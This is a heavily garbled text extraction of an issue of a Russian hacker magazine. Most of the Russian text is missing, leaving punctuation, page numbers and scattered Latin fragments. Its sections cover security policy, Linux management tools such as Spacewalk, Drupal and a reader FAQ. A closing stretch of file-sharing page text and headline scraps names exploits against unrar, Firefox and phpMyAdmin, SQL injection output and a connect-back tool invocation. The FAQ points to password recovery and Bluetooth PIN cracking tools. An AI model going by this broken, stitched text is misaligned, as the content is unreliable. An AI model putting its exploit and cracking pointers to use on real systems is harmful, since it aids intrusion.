: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
500 .

WINDOWS 7
PHPMYADMIN
064

ANDROID 070
152
,
JAVASCRIPT 050
:
, ,
FOX NEWS

+ + 2 DVD:
162
( 35% , )
!
,
.
12 3890 (24 )
6 2205 (12 )
.
,

? info@glc.ru 8(495)663-82-77 ( ) 8 (800) 200-3-999 (

, , ).
SYN/ACK
aka 13oz
INFO

, Information
Security Policies Made
Easy
.
, ,
-152 (
), - ,

,
. , .
-

.
,
,
,

,
.
,

128
?
, ( , ?),
,
. :
(75+ ),
, - 1
. , ,
1 , RDP VPN. -
(
),
.
, , , ,
, -152 ,
, , . .
10 /153/ 2011

- .
, . ,
( ,
), .
? -, , , , ,
, /
.
:
,
,
, .
, :
1.
,
,
.
2. , , etc.
3. , . , ,
.
, (
,
), web- mail-, wsus,
VPN HQ ,
.
. .
, ,
.
, IP-,
,
.
,
, USB- ,

-,
,
. , . ,
,
. :
1. ,
, , , ,
. ,
, ,
, -
.
. ,
, .
2. . ,
. port security .
, - . 1,
, .
port security
10 /153/ 2011
( )
/, . , .
, , ,
,
, .
,
. ,

, ,
,
,

,
, (
IDS), .

:
, ,
. , , , : (
) ,
. , ...
, ,

,
,
, . . .
, , ,
USB-, ,
?.. .
,

, .

, . ?
, .
(

) ,
?

, . ,
, .

.
, -
: ,
.
,

129
SYN/ACK
, ,
.
, :
, ,
,
.
,
. , ,
, ,

,
.
, , - ,
. : ,
.
( ), DLP-.
, ,
, DLP
. , -,
: .
( ,
, ), - ,
, .
, DLP-
,
. , ,
,
. .
,
( ),
,
, , ,
(
), ,
.
Websence DSS.

. , , -
, , , ,
,
. , ,
,
,
.
, :
, . ,
.
,
, web- mail-.
,
DLP-

mail. , , ,
. , , ,
, ,
,
.
? -,
. :
- ,
.
-
. , ,
: - , -
. ,
.

- .
. . ,
. z

:
1. (-).
2. . .
3. Gray Hat Ethical Hackers Handbook.
, -
.
, .
130
10 /153/ 2011
>> coding
SYN\ACK
grinder (grinder@tux.in.ua)
INFO
OCS
Inventory GLPI

][ 06.2010).

LINUX
Linux ,
.

-
( ),
,
,
, , .
,

Linux-.
132
WWW

Symbolic:
opensymbolic.org
Func:
fedorahosted.org/
func
obbler:
fedorahosted.org/
cobbler

Certmaster:
fedorahosted.org/
certmaster
smolt:
smolt.fedoraproject.org
Pulse 2:
pulse2.mandriva.org

Spacewalk:
fedorahosted.org/
spacewalk,
spacewalk.redhat.
com.

SYMBOLIC
Linux ,
. , ,
(Kickstart, AutoYaST
JumpStart, PXE), (Cfengine, Puppet,
Func), bash. .
,
,
. .
-,
*nix. ,
, .
: SYMBOLIC!
Linux Symbolic (opensymbolic.org)
,
:
;
Bash, Perl,
Python, Groovy , ;
10 /153/ 2011
Symbolics
Pulse 2
LDAP, Kerberos,
Kerberos + LDAP (Active Directory) ;
VNC;
, , ;
RSS ( );
RedHat Application Stack,
- .
, 8081 (http://example.
org:8081/symbolic).
Symbolic ( ).

, .
, Ajax. ,
, ,
.
. , RedHat/Fedora. Symbolic
,
: YUM, Func (fedorahosted.org/func), Cobbler
(fedorahosted.org/cobbler), Certmaster (fedorahosted.org/certmaster),
Smolt (smolt.fedoraproject.org). Smolt,
. ,
Puppet.
Symbolic Java. GNU GPL.
, OpenSource
, .
Symbolic Fedora,
. RPM-
Fedora RedHat.
Fedora 15 RedHat6/CentOS6
.

EPEL Extras.
( ) ,
, . , (
) Certmaster Func,
- . symbolic
symbolic-setup, . -
10 /153/ 2011
PULSE 2
RedHat
-. Mandriva , Pulse 2 (pulse2.mandriva.org),
100 . .
. Linux (RedHat/Mandriva/Debian/
Ubuntu), Mac OSX, HP-UX, IBM AIX, Solaris Windows 2k/XP/2k3/
Vista/2k8/Se7en ( x86). , ( Python,
PHP). Pulse 2 OpenSource-.
:
Pulse 2 OCS Inventory NG ( ][ 06.2010),

. ,
GLPI
(glpi-project.org).
Nagios. , ,
. Pulse 2
:
;
;
Pulse 2
133
SYN/ACK
Spacewalk

( );
,
;
VNC-;
;
;
.
1.3.0 Pulse 2 Linbox Rescue
Server ( Pulse 2 Imaging Server).
()
( Linux Windows) . SSH.

Inventory Proxy SSL.
Mandriva Directory Server (mds.
mandriva.org). -,

Mandriva MMC (Mandriva Management Console).
, ,
,
.
.
ACL.
ommunity- , GNU GPL.
VMware Mandriva
Enterprise Server 5 Pulse 2 (
, ).
VMware 256 ,
512 , .
-,
IP- Pulse 2.
Linux .
LDAP MySQL. -
,
. ,
.

Spacewalk (fedorahosted.org/spacewalk, spacewalk.redhat.
com) GPLv2 Red Hat Network
134
Satellite Server, 2001 . .

-, Linux.
, Satellite,
, RedHat.
, .
Satellite, Spacewalk RHEL/
Fedora, SLE/openSUSE Debian. .
(spacewalk.redhat.com/solaris) Solaris.
, Git . Spacewalk, :
;
Xen KVM;
;
;
Kickstart- AutoYaST;
, ;
;
;

.
Spacewalk - , , , .
-, ,
, . .
Spacewalk Proxy .
LDAP. LDAP
, LDIF-, . , , , CSV-.
, , .
,
PostgreSQL Oracle 10g Express Edition.

Oracle Satellite, PostgreSQL .
GOSA2
.
OpenSource- .
GOsa2 (oss.gonicus.de), -,
LDAP.

UNIX Samba, DHCP,
DNS, HTTP, SMTP , VoIP, .
GOsa
. 30 ,
GOsa: Squid, DansGuardin, rsyslog, Postfix, Courier-IMAP, Maildrop,
GNARWL, Cyrus-SASL, OpenSSL, Asterisk, Nagios, OPSI, Netatalk, FAI,
SOGo, OpenGroupware, Kolab, Scalix, ISC DHCP ( LDAP), WebDAV, PureFTPd, PPTP, Kerberos.
10 /153/ 2011
SPACEWALK
, , RedHat/CentOS/Fedora. ,
( Git) , . Debian .

, Fedora 15 Spacewalk :
# rpm -Uvh http://spacewalk.redhat.com/yum/1.5/Fedora/15/x86_64/
spacewalk-repo-1.5-1.fc15.noarch.rpm
jpackage.
# cat > /etc/yum.repos.d/jpackage-generic.repo << EOF
[jpackage-generic]
name=JPackage generic
baseurl=http://mirrors.dotsrc.org/jpackage/5.0/generic/free/
enabled=1
gpgcheck=1
gpgkey=http://www.jpackage.org/jpackage.asc
EOF
SELinux:
# rpm -Uvh 'http://kojipkgs.fedoraproject.org/packages/selinuxpolicy/3.9.16/35.fc15/noarch/selinux-policy-targeted-3.9.16-35.
fc15.noarch.rpm' 'http://kojipkgs.fedoraproject.org/packages/
selinux-policy/3.9.16/35.fc15/noarch/selinux-policy-3.9.16-35.
fc15.noarch.rpm'
.
, .
PostgreSQL. , Spacewalk
:
# yum install spacewalk-postgresql postgresql-server
PostgreSQL,
, :
# spacewalk-setup --disconnected
(,
), . , ( Wiki ),
spacewalk-setup.
GOsa2
Spacewalk
, .
, , , . , .
, ,
- .
.
, Spacewalk. ,
. ,
, .
, .
,
. , , . (
).
.
. , .
. rhn-*. Fedora 15 :
# rpm -Uvh http://spacewalk.redhat.com/yum/1.5/Fedora/15/x86_64/
pacewalk-client-repo-1.5-1.fc15.noarch.rpm
# yum install rhn-client-tools rhn-check rhn-setup rhnsd
m2crypto yum-rhn-plugin
Spacewalk
rhnreg_ks, URL
. :
# rhnreg_ks --serverUrl=http://example.org/XMLRPC \
--activationkey=<->
,
.
Spacewalk
10 /153/ 2011
, Linux-. , ? .
Spacewalk.
Pulse 2 . z
135
SYN/ACK
Spider_NET
Sp
(http://vr-online.ru)
Drupal
.
Drupal
( CMF),
.
, . Drupal
-,
.
136
VIDEO

,

.
ETHERNET-
, , -.
, . ,

, ,
.
, . ,
, :
1. .
.
.
.
. , ,
.
2. . : . ethernet .
.
3. . , Facebook,
, ,
. ,
, () .
.
10 /153/ 2011
Drupal
, ,
. .
( IT-),
.
8. .
. ,
. ,

.
Open Atrium
.
,
. (),
.
DRUPAL!
4.
5.
6.
7.
8.
, ,
.
+ -.

MS Exchange.
, .
- Exchange
. Exhange . ,

MS Exchange,
MS Outlook. ,
.
- web. ,
ethernet-,
, ,
ToDo-, /.
.
, . ,
. ,
,
( ) .
.
.
-, , , , , .
.
,
,
,
.
.
,
.
: , , , . .

. .
Help Desk. ,
IT-.
Ethernet-
IT- .
10 /153/ 2011
Drupal , .
,
. Drupal . -, , -
CMS ,
. Drupal ,
, .
, Drupal

. , . Drupal
, -

. Drupal .
.
,
,
Drupal.
DRUPAL
Drupal . Drupal ,
. ,
.
:
1. CMS Drupal. Drupal, drupal.org.
Drupal Commons
137
SYN\ACK
Dashboard Open Atrium
2. . / .
.
, . ,
.
3. . .
.
. / .
.
. , .
-
Google Calendar.
.
web-based-.
. ToDo-, ,
.
. .
.
Wiki.
/
. Wiki.
. Drupal -
... Drupal,
. OA
,
, , Drupal.
DRUPAL
OPEN ATRIUM
http://openatrium.com/
Open Atrium ,
. Open Atrium ,
. . , OA ,
-. OA Drupal, ,
Drupal
. OA
-.
OA . 2009 .,

. , OA
.
(1.0) .

. Open Atrium
.
: , wysiwyg-,
. .

,
, . Drupal,

drupal.org/project. ,
Open Atrium
.
138
Drupal
-. ,
Drupal. .
Conference Organizing Distribution (http://drupal.org/project/cod)
. ,
,
. , Drupal LA, Drupal
Kiev Camp.
Array Shift (http://drupal.org/project/arrayshift)
stackoverflow.com.
, .
Drupal Social Netwrok framework (http://drupal.org/project/dsnf_install)
,
.
,
.
DrupalBin (http://drupal.org/project/drupalbin) , /
. .
.
ELMS (http://drupal.org/project/elms)
(
, . .).
.
eRecruiter (http://drupal.org/project/recruiter)
, . , -,
.
.
Single-use blog (http://drupal.org/project/single_user_blog)
.
WordPress.
10 /153/ 2011
Drupal
. GCalendar?
-.
,
( ).
OA , .

Open Atrium .
,
. ,
-. OA
.

. .
,
/ .
,
. , .
.
.
OA, , .
, . . .

.
: 8/10.
DRUPAL COMMONS
http://acquia.com/downloads
Drupal Commons .

.
-. , Drupal Commons
. DC. Open
Atrium, DC
Acquia.
Drupal. , Drupal, Open Scholar, Acquia Drupal, OpenPublish.

. , Microsoft Acquia.

. . ,
.
/.
Wiki.
.
.

Drupal.
.
, DC- .
.
.
: 5/10.
Drupal Commons
10 /153/ 2011
Drupal . Drupal . Drupal

,
, CMS ,
(-
) . . ,
.
Drupal.
-, ( ), . z
139
UNITS / FAQ UNITED
FAQ United

FAQ@REAL.XAKEP.RU

OPENWRT, , ,
.
, -
4 .
,
,

(
)?

, .
OpenWRT (openwrt.org)
Image
Generator (bit.ly/oWxmJd),
firmware.
,
,
.
PPTP/L2TP. ?

( ).
,
,
,
.
,
RouterPassView (www.
nirsoft.net/utils/router_password_recovery.
html).
,
Grab Password
From IE Window. ,
Internet Explorer.
WI-FI,
. ,
?

,
, .
,
, ChilliSpot (www.
chillispot.info). ?

- , Chillispot DNS- ,
.
,
. RADIUS-
( FreeRadius www.freeradius.org).

, ChilliSpot .
Linux-.

FIREFOX,

-
. - ?
Firefox .
, - ,
. Firefox
: ,
4.0 ( ),
6.0.2 . :
1. , .xpi- (

Firefox) zip-. ,
.
2. install.rdf targetApplication:
<em:targetApplication>
<Description>
<em:id>{ec8030f7-c20a-464f-9b0e13a3a9e97384}</em:id>
<em:minVersion>4.0</em:minVersion>
<em:maxVersion>5.0</em:maxVersion>
</Description>
</em:targetApplication>
,
minVersion maxVersion.
3. zip- .xpi.

Nightly Tester Tools (bit.ly/pwWh7c).
5 :
,
. -

.
( nmap:
nmap -sL 146.187.130.0/24), ,
.
?
140
, ,

. SNMP-,
( traceroute),
.
, .
LanTopolog (www.lantopolog.com/rus).
,
,
SNMP.
. !
10 /153/ 2011
FAQ UNITED

-
,
.
TOR
LINUX. :
TORIFY
(TORIFY FIREFOX) TORSOCKS (TORSOCKS
FIREFOX). .
?
, -,
, ( ), , ,
.
, EDGE-, GPRS-, 3G-,
. ,

( - . .). XCode (developer.apple.com/technologies/tools),
iPhone/iPad, . Network Link Conditioner
. Windows
SoftPerfect Connection Emulator (www.softperfect.com): ,
. TMnetSim Network Simulator (www.
tmurgent.com/tools.aspx). , ( , ) GUI. (, SQL Server).
WANem (wanem.sourceforge.net).
Knoppix LiveCD-,
-. LiveCD ,
(, VirtualBox) .
torsocks,
DNS-
,
.
, , ,
. ,
?

TOR?
1. GUI-
Tor Vidalia.
2. Settings Services.
3. Virtual Port,
Target Directory Path. , :
Virtual Port: 80
Target: 127.0.0.1:80 or just 127.0.0.1
Directory Path: c:\torhs or /home/username/
torhs
4. ,
Service .onion- ,
.

AMAZON S3?
,
Amazon
AWS Free Usage Tier (aws.amazon.
com/free), S3 . ,
.
Windows.
,
Amazon S3. ,
( CloudBerry Online
Backup, www.cloudberrylab.com).
Nmap (nmap.org).

. GUI- Zenmap
.
----traceroute.
10 /153/ 2011
Network Link Conditioner

: , 3G . ,
,
rumint (rumint.org).
, , .

PCAP .
.
NetCrunch (www.adremsoft.com).

IP-, , ,
,
. !
141
UNITS / FAQ UNITED
CloudBerry Online Backup Amazon S3
, , , -
, Bonkey
(thebackupmonkey.blogspot.com).
Linux.
s3- s3cmd.
Ubuntu
(
: apt-get install s3cmd). , ,
,
S3,
: s3cmd --configure.
, ,

. , s3cmd
rsync:
s3cmd --acl-private --bucket-location=EU
--guess-mime-type --delete-removed sync /
local/backup/ s3://xakep/backupfromserv1
cron ,
( - Amazon
).
,
?
:
s3cmdsyncs3://xakep/backupfromserv1/local/
backup/

Q , . (
)

. ?

forensics-. ,
, OWADE (OFFLINE
WINDOWS Analyzer and Data Extractor, bitbucket.
142
RouterPassView ,
org/Elie/owade). Python,
Linux
Windows. (./main.py) 8080-
(http://
localhost:8080/owade),

.

BLUETOOTH.
PIN-
(BLUETOOTH PASS PHRASE).
, ?

BTCrack.
(bit.ly/oKWbij),
Linux (bit.ly/qHkCoQ).
,
,

( , ,
). Bluetooth
,
,
.

PYTHON.
?

Beautiful Soup (www.crummy.com/software/
BeautifulSoup), lxml (lxml.de), scrapy (scrapy.org).
Grab (bitbucket.org/
lorien/grab),
.

(bit.ly/p9Srxf):
(cookies,
http-, POST/GET-);
(
HTTP/SOCKS-);
( ,
cookies, ,
);
DOM-
( HTML-);
(,
);
: ,
.
,
xakep Google
10 :
g = Grab()
g.go('http://www.google.ru')
g.set_input('q', 'xakep')
g.submit()
for elem in g.itercss('#rso li h3 a'):
print u'%s | %s' % (elem.get('href'),
elem.text_content().strip())
,

. ,

.
,

( ).
FEDORA.
Sagan (sagan.
quadrantsec.com).

IDS- Snort.
,
oinkmaster (oinkmaster.
sourceforge.net) pulledpork (code.google.com/p/
pulledpork). , Snort , Sagan
. z
10 /153/ 2011
>Net
Cyberduck 4.1.2
DynaMAC 2011-08-31
Fiddler2
G+7 1.2.0.0
LinkChecker 7.1
Miranda IM 0.9.30
MTPuTTY 1.0 Beta
NetworkTrafficView 1.00
>Multimedia\
AIMP 2.61 Build 583
FastPreview 3.1
FastStone Image Viewer 4.6
GOM Player 2.1.33.5071
Graphs Made Easy 3.1
Juice
Lightshot 1.4
Open Freely
Paint.NET 3.5.8
Snaplr
VisualSubSync 1.0.0
ZS4 Video Editor 0.958
>Misc
4t Tray Minimizer Free 5.52
8start Launcher 3.0
Autosensitivity 1.4
Better Directory Analyzer 1.0
Bins
EyeLeo 1.1
FastPreview
FileMindQuickFix 1.0
Gest 2.3.0
HotkeyP
LightShot 1.4.0
Microsoft Mathematics 4.0
Mouse Without Borders
Prey 0.5.3
SuperCopier 2.2 Beta
TouchFreeze 1.0.2
>>WINDOWS
>Development
Beyond Compare 3
DiffMerge 3.3.1
DPack v3.0.13
DreamCoder for MySQL 6.0
DreamCoder for Oracle 6.0
DreamCoder for PostgreSQL 6.0
EmEditor Free 6.00.4
EmEditor Professional 10.1.1
GhostDoc 3.0
HelpNDoc
IOGraph 0.9
NUnit 2.5.10
OdoPlus 1.6
PostgreSQL 9.1
ReSharper 6.0
StyleCop 4.5
TestDriven.NET 3.1.2759 Beta
Visual Assist X 10.6
Visual Paradigm for UML 8.2
Community Edition
VisualSVN 2.0.6
VisualSVN Server 2.1.10
XRefresh 1.5
>>UNIX
>Desktop
Clex 4.6
Converseen 0.4.3
Double Commander 0.5.0
Genius 1.0.14
Gnac 0.2.3
GTKRawGallery 0.9.61
jHepWork 3.1
Jomic 0.9.33
Kwave 0.8.6
Mplayer tools 7.8
QtiPlot 0.9.8.8
Qucs 0.0.16
Recoll 1.15.8
Shotwell 0.11
Tovid 0.34
>System
Bluetooth Driver Installer 1.0.0.72
Boot-US 2.1.8
CCleaner 3.10
Check Disk GUI
Comodo System-Cleaner 3.0.17
Crucial System Scanner
Defraggler 2.06
Disk Bench 2.6.1.0
ERUNTgui 1.3.0
HWiNFO
Malwarebytes Anti-Malware
1.51.2.1300
Minimem 2.0
Moo0 SystemMonitor 1.64
Recuva 1.40
Secunia PSI 2.0
Speccy 1.12.265
SSDlife Free 2.1.29
USB Monitor
VirtualBox 4.1.2
Web Log Storming
> Security
Agnitio v2
AVZ 4.35
Cryptohaze Multiforcer 1.0
HashGenerator 1.0
INSECT Pro 2.6.1
ldap-blind-explorer
MoonSols DumpIt
pev 0.40
SIP Inspector 1.34
theHarvester 2.1 Blackhat Edition
TrueCrypt 7.1
WebInject 1.41
WFuzz 2.0
WPScan WordPress Security
Tool 1.0
xpath-blind-explorer
ZAP 1.3.2
SFTP Net Drive 1.0.12

ShareScan 1.0.0.2
VPN Watcher
WakeMeOnLan v1.10
Website Load Tool 1.0
York 1.50
>Security
Aide 0.15.1
Arachni 0.3
Armitage 09.08.11
Bastille 3.2.1
FBPwn 0.1.3
Lshell 0.9.14
Malheur 0.5.2
Megiddo 0.4.0
Mobius Forensic Toolkit 0.5.9
Nixory 1.1
Suricata 1.0.5
T50 5.4
Trojan scan 1.4.1
TrueCrypt 7.1
UnHash 1.1
Websecurify 0.8
Wireshark 1.6.2
Xfprot 2.4
aidsql
APKInspector BETA
Cryptohaze Multiforcer 1.0
>Net
Adobe Flash Player 10.3.181.22
BaGoMa 1.10
BitlBee 3.0.3
Cone 0.89
Creepy
Google Chrome 13
gPodder 2.13
JFBChat 0.2.2
LinkChecker 7.1
Linphone 3.4.3
Mozilla Firefox 6.0.2
NetworkManager 0.9
Opera 11.51
Qt Cloud Drive
quIRC 0.7.11
Tyrs 0.4.0
Wget 1.13
Xymon Alert 4.3.4
>Devel
Collabtive 0.7
Database Deployment Manager
0.1e
DBeaver 1.3.4
dbm 1.9
Dhex 0.65
diffutils 3.1
GDB 7.3a
IPython 0.11
JFormDesigner 5
JPPF 2.5.2
MetaModel 2.0
MyJgui 0.7.4.1
PyPy 1.6
Qt Creator 2.3
Rails 3.1
RKWard 0.5.6
Shogun 1.0.0
Vaadin 6.6.6
Veusz 1.13
Videotrans 1.6.1
XPaint 2.9.8.2
>>MAC
Adium 1.4.3
Android SDK 3.0r12
ClamXav 2.2.2
DesktopUtility 1.2.2
Firebird 2.1.4
FreeCol 0.10.2
FunctionFlip 2.2
GeoGebra 4.0
Lion Tweaks 1.3
Mac Games Arcade 1.7.7
MAMP 2.0.3
OpenSSH 5.9
Python 3.2.2
Parallels Desktop 7 Mac
RedQuits 2.0
Skitch 1.0.7
SMARTReporter 2.7.0
SSH Tunnel Manager 2.1.4
TrueCrypt 7.1
Tubbler 1.3.1
TVShows 2.0b11
>X-distr
Chrome OS 1.5.849
Mandriva Linux 2011.0
>System
Apt-dater 0.8.5
AQEMU 0.8.1
Arkeia 9
BleachBit 0.9.0
Ccfe 1.51
Collectd 5.0.0
eMount 0.11.2
Extcarve 1.1
G4L 0.38
Giis-ext4 0.7
HDT 0.5.0
OSS 4
QEMU 0.15
Tvpvrd 3.3.2
>Server
ABillS 0.53
Apache 2.2.20
Ashd 0.8MUSCLE 5.56
MySQL 5.5.15
OpenLDAP 2.4.26
OpenSSH 5.9
OpenVPN 2.2.1
Postfix 2.8.5
PostgreSQL 9.0.4
Samba 3.6.0
Sendmail 8.14.5
fuzzdb 1.09
hashkill 0.2.4
Malheur 0.5.1
peter-bochs
pev 0.40
SIP Inspector 1.34
slowhttptest 1.1
Snort 2.9.1
TrueCrypt 7.1
Wfuzz 2.0
10(153) 2011
UNITS /
Lockpicking

,

.

,
.
2
,
.
,
. . .
-

,

. ,

144
:
,
.
:
-,

-.
,

:
, -

.
10 /153/ 2011

,

.
,

.
>> coding
CODING
ALEKSANDR-EHKKERT@RAMBLER.RU

Хакер 2011 10 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2011 10 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

SQLMAP: SQL-

DEFCON CTF 2011

802.22: White Space

BLACK HAT 2011

83% GOOGLE+ , Bime Analytics.

SAMSUNG GALAXY XCOVER

Samsung Galaxy Xcover Samsung Social Hub,

Dave + metasploit's changelog

22 APPLE , Apple Store.

ANDROID 2.3 (GingerMaster) Android Marketplace.

COOLER MASTER SILENT

ENERMAX MODU87+ 800W

FSP AURUM GOLD 600

FSP AURUM GOLD 700

6+2 pin, SATA Molex,

2011 . (Institute of Electrical and Electronics Engineers)

802.22: White Space

, IEEE 802.22 WRAN , . ,

Wireless Wide Area Network

Wireless Regional Area Network

Wireless Metropolitan Area Networks

Wireless Local Area Network

Wireless Personal Area Network

$ G P R M C , h h m m s s . s s , A ,G G M M . M M , P, g g g m m . m m , J,v.v, b b , d d m m y y, x . x , n , m* h h < C R > < L F >

802.22: White Space

UNION query SQL injection

Boolean-based blind SQL injection

INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Error-based SQL injection

web application technology: PHP 5.2.6, Apache 2.2.9

JavaScript PC Emulator Firefox

sudo apt-get install ruby rubygems

GreenDog , DSecRG.ru (agrrrdog@gmail.com, twitter.com/antyurin)

XSS-track (goo.gl/lXmF8) XSS-. ,

Shell of the Future. ,

Shell of the Future:

( 2009 , ESX 3.5),

3. vCenter (VI client) : 127.0.0.1:9999.

Firefox 3.6.16 OBJECT mChannel Remote Code

PJL 309 WEP !

unrar <= 3.93

Unrar 3.9.3 Local Stack

grep "ff e4" | grep jmp

zyx2145 , @Kaspersky Lab

Capture the Flag ,

0X02. DEFCON CTF PREQUALS

PWTENT PWNABLES 500

NtSetInformationThread with (push 11h ; ThreadHideFromDebugger).

0X05. WHAT HAPPENS IN VEGAS STAYS IN VEGAS

ICANN TRO (temporary

cURL, , . . Mozilla Firefox

$filedata = explode('<p align="center">', $out);

GET /31402491 HTTP/1.1

$info = parseLinks(genLinks(31402491, 31402591));

GreenDog, DSecRG.ru, Digital Security (agrrrdog@gmail.com)

Win+U + Help + Jump to url = Explorer

Pr0xor Kotov (https://rdot.org/forum/)

LFI phpMyAdmin sql.php

INSERT INTO 'test'.'pmatest' ('column_name', 'mimetype',

(icq 884888, http://snipper.ru)

defbc.exe <server ip> <server port>

Zdez Bil Ya.